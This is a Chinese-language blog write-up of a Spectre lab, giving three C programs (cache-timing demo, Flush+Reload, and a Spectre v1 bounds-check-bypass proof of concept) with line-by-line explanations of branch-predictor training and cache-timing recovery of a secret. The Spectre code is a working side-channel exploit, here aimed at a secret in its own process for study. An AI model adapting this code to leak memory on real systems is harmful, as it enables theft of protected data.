Spectre Lab

tags: `exploitation`

之前聽到 spectre 的漏洞時就想自己做做看，但是當時知道原理卻不知道到底如何實作，所以一直無法執行，去年找到一個網站提供一個 vm 和數個程式可以操作，決定研究一下具體如何實踐。

※ 以下的程式碼編譯指令： gcc -g <filename.c> -o <filename> -msse2

Cache Time

這個單純說明有無 cache 在 cpu 執行週期的差別：




























#include <emmintrin.h>
#include <x86intrin.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>

uint8_t array[10*4096];

int main(int argc, const char **argv) {
  int junk=0;
  register uint64_t time1, time2;
  volatile uint8_t *addr;
  int i;
  // Initialize the array
  for(i=0; i<10; i++) array[i*4096]=1;
  // FLUSH the array from the CPU cache
  for(i=0; i<10; i++) _mm_clflush(&array[i*4096]);
  // Access some of the array items
  array[3*4096] = 100;
  array[7*4096] = 200;
  for(i=0; i<10; i++) {
    addr = &array[i*4096];
    time1 = __rdtscp(&junk);   junk = *addr;
    time2 = __rdtscp(&junk) - time1;  
    printf("Access time for array[%d*4096]: %d CPU cycles\n",i, (int)time2);
  }
  return 0; 
}

重點介紹幾個地方：

register uint64_t time1, time2; (line 11)
register keyword 會提醒 compiler 以下的 variable 可以放置在 register 就好，不用塞到 stack 上，但是最終還是由 compiler 決定到底是放在 register 還是 stack 上。
volatile uint8_t * addr;
volatile keyword 提醒 compiler 不要因為最佳化而把該變數用 register 存取
_mm_clflush(const void *p)
根據 intel 的這個網站，敘述是否定現今存在於 cache 的 p 並且清除所有等級的 cache (L1 ~ L3 ?)
__rdtscp(&junk);
這是組語指令，在開銷不大的情況下用來計算 cpu cycle ，通常前面和結尾還需要加上 cpuid 這條指令以防止 out-of-order 的出現(不過效能會掉很多，尤其是開在虛擬機裡面的時候)， rdtscp 會保證之前的 instruction 都已經完成再執行。

綜合以上，簡單講就是先 flush 掉跟 array[i*4096] 相關的 cahce 然後再對 array[3*4096] 和 array[7*4096] 進行賦值，這樣 cache 就會存放這兩個地址相關的 cache (依據時間和空間相關性)，最後訪問 array[i*4096], 0 <= i < 10 ，然後用 rdtscp 比對 cycle

Image Not Showing Possible Reasons

The image file may be corrupted
The server hosting the image is unavailable
The image path is incorrect
The image format is not supported

Learn More →

FlushReload




















































#include <emmintrin.h>
#include <x86intrin.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>

uint8_t array[256*4096];
int temp;
char secret = 94;
/* cache hit time threshold assumed*/
#define CACHE_HIT_THRESHOLD (80)
#define DELTA 1024

void victim()
{
  temp = array[secret*4096 + DELTA];
}
void flushSideChannel()
{
  int i;
  // Write to array to bring it to RAM to prevent Copy-on-write
  for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1;
  //flush the values of the array from cache
  for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 +DELTA]);
}

void reloadSideChannel()
{
  int junk=0;
  register uint64_t time1, time2;
  volatile uint8_t *addr;
  int i;
  for(i = 0; i < 256; i++){
   addr = &array[i*4096 + DELTA];
   time1 = __rdtscp(&junk);
   junk = *addr;
   time2 = __rdtscp(&junk) - time1;
   if (time2 <= CACHE_HIT_THRESHOLD){
	printf("array[%d*4096 + %d] is in cache.\n", i, DELTA);
        printf("The Secret = %d.\n",i);
   }
  } 
}

int main(int argc, const char **argv)
{
  flushSideChannel();
  victim();
  reloadSideChannel();
  return (0);
}

Reload flush 比較複雜一點，但還是一個一個慢慢看：

#define CACHE_HIT_THRESHOLD (80)
這個根據下面的 code 應該是用來比對資料是否存在於 cache 的基準，也就是說超過 80 cycle 的就不算在 cache 內

不過我不確定這標準從何而來就是了…

char secret = 94;
secret 是拿來當作找尋的目標，若 array[i * 4096 + DELTA] 在 80 cycle 以內就找到的話，那代表 i 就是在 victim() 內放入 cache 的 secret 。




void victim()
{
  temp = array[secret*4096 + DELTA];
}

綜合以上，可以看成：

先賦值再 flush 掉 cache
在 victim() 內將 array[secret * 4096 + DELTA] 的值放入 cache
reloadSideChannel() 去訪問 array[i * 4096 + DELTA] 後比對花費 cycle ，若有時間小於 80 cycle 勢必之前存在於 cache 內，那在 cache 被 flush 過的情況下也就只有 secret 這個 index 有在 victim() 被 access ，所以 cycle 特別小

這個實驗不是每次都成功，不知道哪些 process 還是什麼的會把 cache 洗掉 = =

Spectre Attack

這邊又比上一個更難…，花了點時間終於弄懂













































































#include <emmintrin.h>
#include <x86intrin.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>

unsigned int buffer_size = 10;
uint8_t buffer[10] = {0,1,2,3,4,5,6,7,8,9}; 
uint8_t temp = 0;
char *secret = "Some Secret Value";   
uint8_t array[256*4096];

#define CACHE_HIT_THRESHOLD (80)
#define DELTA 1024

// Sandbox Function
uint8_t restrictedAccess(size_t x)
{
  if (x < buffer_size) {
     return buffer[x];
  } else {
     return 0;
  } 
}

void flushSideChannel()
{
  int i;
  // Write to array to bring it to RAM to prevent Copy-on-write
  for (i = 0; i < 256; i++) array[i*4096 + DELTA] = 1;
  //flush the values of the array from cache
  for (i = 0; i < 256; i++) _mm_clflush(&array[i*4096 +DELTA]);
}

void reloadSideChannel()
{
  int junk=0;
  register uint64_t time1, time2;
  volatile uint8_t *addr;
  int i;
  for(i = 0; i < 256; i++){
    addr = &array[i*4096 + DELTA];
    time1 = __rdtscp(&junk);
    junk = *addr;
    time2 = __rdtscp(&junk) - time1;
    if (time2 <= CACHE_HIT_THRESHOLD){
	printf("array[%d*4096 + %d] is in cache.\n", i, DELTA);
        printf("The Secret = %d.\n",i);
    }
  } 
}
void spectreAttack(size_t larger_x)
{
  int i;
  uint8_t s;
  volatile int z;
  // Train the CPU to take the true branch inside restrictedAccess().
  for (i = 0; i < 10; i++) { 
   _mm_clflush(&buffer_size);
   restrictedAccess(i); 
  }
  // Flush buffer_size and array[] from the cache.
  _mm_clflush(&buffer_size);
  for (i = 0; i < 256; i++)  { _mm_clflush(&array[i*4096 + DELTA]); }
  for (z = 0; z < 100; z++) { }
  // Ask restrictedAccess() to return the secret in out-of-order execution. 
  s = restrictedAccess(larger_x);  
  array[s*4096 + DELTA] += 88;  
}

int main() {
  flushSideChannel();
  size_t larger_x = (size_t)(secret - (char*)buffer);  
  spectreAttack(larger_x);
  reloadSideChannel();
  return (0);
}

一樣快速講重點：

uint8_t buffer[10] = {0,1,2,3,4,5,6,7,8,9};
視為可以合法存取的範圍
char *secret = "Some Secret Value";
不能存取的範圍，但是透過 Spectre Attack 可以讀到裡面的內容
uint8_t array[256*4096];
用來 side channel attack 的陣列








uint8_t restrictedAccess(size_t x)
{
  if (x < buffer_size) {
     return buffer[x];
  } else {
     return 0;
  } 
}

這個 function 主要是用來將 branch predicter 會因為之前的結果而先選擇某一條分支，並將結果存在 cache 內，等等會看到具體用法





  // Train the CPU to take the true branch inside restrictedAccess().
  for (i = 0; i < 10; i++) { 
   _mm_clflush(&buffer_size);
   restrictedAccess(i); 
  }

根據註解，這是用來「訓練」 CPU 的 branch predictor 讓其判斷說該 function 大多數的結果都是 return buffer[x]; 而先執行，等出錯再 roll back




  for (z = 0; z < 100; z++) { }
  // Ask restrictedAccess() to return the secret in out-of-order execution. 
  s = restrictedAccess(larger_x);  
  array[s*4096 + DELTA] += 88;

將 secret 到 buffer 的偏移當作參數傳輸給 restrictedAccess() ，因為之前訓練的關係， branch predictor 會優先選擇 return buffer[x] 並透過 array[buffer[x]*4096 + DELTA] 將其值存於 cache 中，之後 rollback 後會修正回傳 array[0*4096 + DELTA] 但 array[buffer[x]*4096 + DELTA] 依然存在於 cache 中。

有了上面的解釋就清楚了：

flush 掉 cache 避免失真
計算出 secret buffer 到 buffer 的 offset
進入 Spectre Attack 範疇
1. 用 restrictedAccess 訓練 branch predictor 讓其偏向 return buffer[x]
2. 將 offset 丟到 restrictedAccess 中， branch predicotr 因為之前的結果會先 return buffer[x]
3. 用得到的結果去訪問相關地址
4. CPU 發現執行錯了， rollback 並修正，但是 cache 沒有洗掉
計算訪問 array[i*4096 + DELTA] 的時間，看哪個 cycle 小於 80 ，則判斷說該地址的值之前存在於 cache 中

不過上述的 code 感覺穩定性不是很高…，要試不少次才成功：

要找下一個還要加 1 然後繼續刷…

Spectre Lab

tags: exploitation

Cache Time

FlushReload

Spectre Attack

Read more

C 語言黑魔法

惡意代碼分析

debug process hanging when stat a disconnected nfs server

Introduction to Hardware Efficiency in Cpp

tags: `exploitation`